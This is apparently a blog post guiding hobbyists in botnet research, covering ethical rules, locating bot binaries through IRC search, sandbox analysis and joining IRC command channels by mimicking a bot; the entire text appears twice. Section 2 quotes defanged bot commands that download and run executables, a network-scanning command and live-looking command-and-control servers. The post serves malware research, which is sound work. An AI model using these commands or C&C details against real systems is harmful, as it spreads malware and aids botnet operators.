Researching your own botnets
This post is mainly for people interested in researching botnets. Many people treat botnet monitoring as a hobby. In many ways, its almost as fun as people watching.
Section 1, the rules of behavior:
You will likely see information you should not normally be privy to. For example, keylogged data, passwords, IP's of vulnerable systems, instant messenger conversations, etc. You must not repeat any private information you see. You must not use any private information you see. You may report leaks of private information to the victim (if known) or law enforcement. Do not report such information to botnet monitoring groups, mailing lists or blogs. Remember, you too could be the victim some day. Treat the data you see with respect.
You may at some point get admin rights on the botnet - Occasional hiccups happen. You must not issue any commands to disrupt the botnet or remove the drones. Issuing commands places you in the same category as the attacker, and in many countries you can be charged criminally if caught. There have been extreme cases where botnet authors replace the remove function with hostile code that causes more damage to the victim PC.
You may contact ISP's, domain registrars, and victims in attempts to get the botnet taken offline. You will likely receive the hairy eyeball - be prepared to back up your accusations/statements with hard facts.
In some countries monitoring botnets is illegal, in others there has not yet been a ruling. Check your local laws before monitoring! Understand you accept all risks. If your not comfortable with this, don't read any further.
You will likely get attacked or threatened. As you learn how the botnets work, you will likely tip your hand. Everyone does. Since botnet hunting has become such an interesting hobby, there are hundreds of other people making these mistakes too. For that reason, the botnet operators (aka herders) have a keen eye and can identify snoopers quickly. In most cases you will simply be denied access to the botnet, by IP banning. In others you will be threatened by the botnet operator, or hit with denial of service attacks. This generally upsets your internet service provider, and you could risk losing internet access.
Never, ever, use proxys to snoop on botnets. If your too chicken to do it from IP addresses you have legitimately rented, then don't track botnets. Using proxy's means you're placing someone else at risk for denial of service attacks, and repeated attacks could mean they lose internet access. While there is a certain risk proxy operators take, your sloppy botnet monitoring skills should not be one of them. Dialup accounts are cheap, between 5 and 10 dollars a month in the US. Use one if you're worried about staying anonymous. Additionally you don't know who may be intercepting proxy traffic. A proxy operator may not be as honest as you, and may use captured botnet traffic maliciously.
Section 2, Locating binaries:
For this section I turned to my old Standby, SearchIRC. Using the keywords ".download http:// .exe" I was able to find:
.download http://www[dot]kartalkusculari[dot]com/oky.exe C:/oky.exe 1
Connects to:
Server: irc.webmaster.com
Port: 6667
Channel: #pert
Channel Topic: .advscan asn2 200 5 0 -r -b
Also downloads http://www[dot]freewebtown[dot]com/hidex/test.exe
.http.exe http://www[dot]freewebtown[dot]com/ssexs/mode.exe C:mode.exe 1
Connects to:
Server: irc.webchat.org
Port: 6667
Channel: #Scanall`
.scarikiamo http://www[dot]freewebtown[dot]com/n0mad/abdo.exe c:/abdo.exe 1
Connects to:
Server: f0ryou.no-ip.info
Port: 6667
Channel: ##!scanall, ##!scanallexp
Other malicious files can be found by looking through the archives at MalwareDomainList and OffensiveComputing.
Section 3, extracting information:
Malware disassembly is an art, and something that can't be explained in a paragraph or two. However there are a few online sandboxes that will assist you as you get started botnet hunting. Anubis and CWSandbox are great. If you have time and resources to spare, investigate creating your own Truman sandnet. Once you've decided to manually reverse engineer malware, I suggest looking around OpenRCE, and attending an Assembler class at a local college.
Other useful tools for new hunters include: Process Explorer, Malcode Analysis Pack, IdaPro, OllyDbg, Cygwin, Perl and Python.
Section 4, putting it all together:
Once you've downloaded a binary, upload it to one of the free sandbox tools listed above. These tools will give pretty detailed information. If your binaries Command and Control (C&C) method is IRC, fire up Infiltrator. Using the sandbox details you should be able to set your username, nickname, and software version to mimic the bot. Connect to the botnet and log the traffic (if permitted by local Laws).
Keep a journal of what you see, learn how the bot interacts with the operator. Learn the commands commonly used, and watch for additional malware as the bots are updated or moved. Note any click-fraud or denial of service attacks.
Section 5, moving on:
Computer security doesn't start or stop with botnets and malware. There are so many more things to explore and learn. Attend conferences, join local user groups and mailing lists, obtain SANS certifications. You never know what the next big thing will be. Stay cutting edge and you will enjoy everything computer security has to offer.
Section 1, the rules of behavior:
You will likely see information you should not normally be privy to. For example, keylogged data, passwords, IP's of vulnerable systems, instant messenger conversations, etc. You must not repeat any private information you see. You must not use any private information you see. You may report leaks of private information to the victim (if known) or law enforcement. Do not report such information to botnet monitoring groups, mailing lists or blogs. Remember, you too could be the victim some day. Treat the data you see with respect.
You may at some point get admin rights on the botnet - Occasional hiccups happen. You must not issue any commands to disrupt the botnet or remove the drones. Issuing commands places you in the same category as the attacker, and in many countries you can be charged criminally if caught. There have been extreme cases where botnet authors replace the remove function with hostile code that causes more damage to the victim PC.
You may contact ISP's, domain registrars, and victims in attempts to get the botnet taken offline. You will likely receive the hairy eyeball - be prepared to back up your accusations/statements with hard facts.
In some countries monitoring botnets is illegal, in others there has not yet been a ruling. Check your local laws before monitoring! Understand you accept all risks. If your not comfortable with this, don't read any further.
You will likely get attacked or threatened. As you learn how the botnets work, you will likely tip your hand. Everyone does. Since botnet hunting has become such an interesting hobby, there are hundreds of other people making these mistakes too. For that reason, the botnet operators (aka herders) have a keen eye and can identify snoopers quickly. In most cases you will simply be denied access to the botnet, by IP banning. In others you will be threatened by the botnet operator, or hit with denial of service attacks. This generally upsets your internet service provider, and you could risk losing internet access.
Never, ever, use proxys to snoop on botnets. If your too chicken to do it from IP addresses you have legitimately rented, then don't track botnets. Using proxy's means you're placing someone else at risk for denial of service attacks, and repeated attacks could mean they lose internet access. While there is a certain risk proxy operators take, your sloppy botnet monitoring skills should not be one of them. Dialup accounts are cheap, between 5 and 10 dollars a month in the US. Use one if you're worried about staying anonymous. Additionally you don't know who may be intercepting proxy traffic. A proxy operator may not be as honest as you, and may use captured botnet traffic maliciously.
Section 2, Locating binaries:
For this section I turned to my old Standby, SearchIRC. Using the keywords ".download http:// .exe" I was able to find:
.download http://www[dot]kartalkusculari[dot]com/oky.exe C:/oky.exe 1
Connects to:
Server: irc.webmaster.com
Port: 6667
Channel: #pert
Channel Topic: .advscan asn2 200 5 0 -r -b
Also downloads http://www[dot]freewebtown[dot]com/hidex/test.exe
.http.exe http://www[dot]freewebtown[dot]com/ssexs/mode.exe C:mode.exe 1
Connects to:
Server: irc.webchat.org
Port: 6667
Channel: #Scanall`
.scarikiamo http://www[dot]freewebtown[dot]com/n0mad/abdo.exe c:/abdo.exe 1
Connects to:
Server: f0ryou.no-ip.info
Port: 6667
Channel: ##!scanall, ##!scanallexp
Other malicious files can be found by looking through the archives at MalwareDomainList and OffensiveComputing.
Section 3, extracting information:
Malware disassembly is an art, and something that can't be explained in a paragraph or two. However there are a few online sandboxes that will assist you as you get started botnet hunting. Anubis and CWSandbox are great. If you have time and resources to spare, investigate creating your own Truman sandnet. Once you've decided to manually reverse engineer malware, I suggest looking around OpenRCE, and attending an Assembler class at a local college.
Other useful tools for new hunters include: Process Explorer, Malcode Analysis Pack, IdaPro, OllyDbg, Cygwin, Perl and Python.
Section 4, putting it all together:
Once you've downloaded a binary, upload it to one of the free sandbox tools listed above. These tools will give pretty detailed information. If your binaries Command and Control (C&C) method is IRC, fire up Infiltrator. Using the sandbox details you should be able to set your username, nickname, and software version to mimic the bot. Connect to the botnet and log the traffic (if permitted by local Laws).
Keep a journal of what you see, learn how the bot interacts with the operator. Learn the commands commonly used, and watch for additional malware as the bots are updated or moved. Note any click-fraud or denial of service attacks.
Section 5, moving on:
Computer security doesn't start or stop with botnets and malware. There are so many more things to explore and learn. Attend conferences, join local user groups and mailing lists, obtain SANS certifications. You never know what the next big thing will be. Stay cutting edge and you will enjoy everything computer security has to offer.
Labels: Anubis Sandbox, Botnet monitoring, Computer Security, Infiltrator, malware research, TOR
posted by Nicholas at
05:17
0 Comments
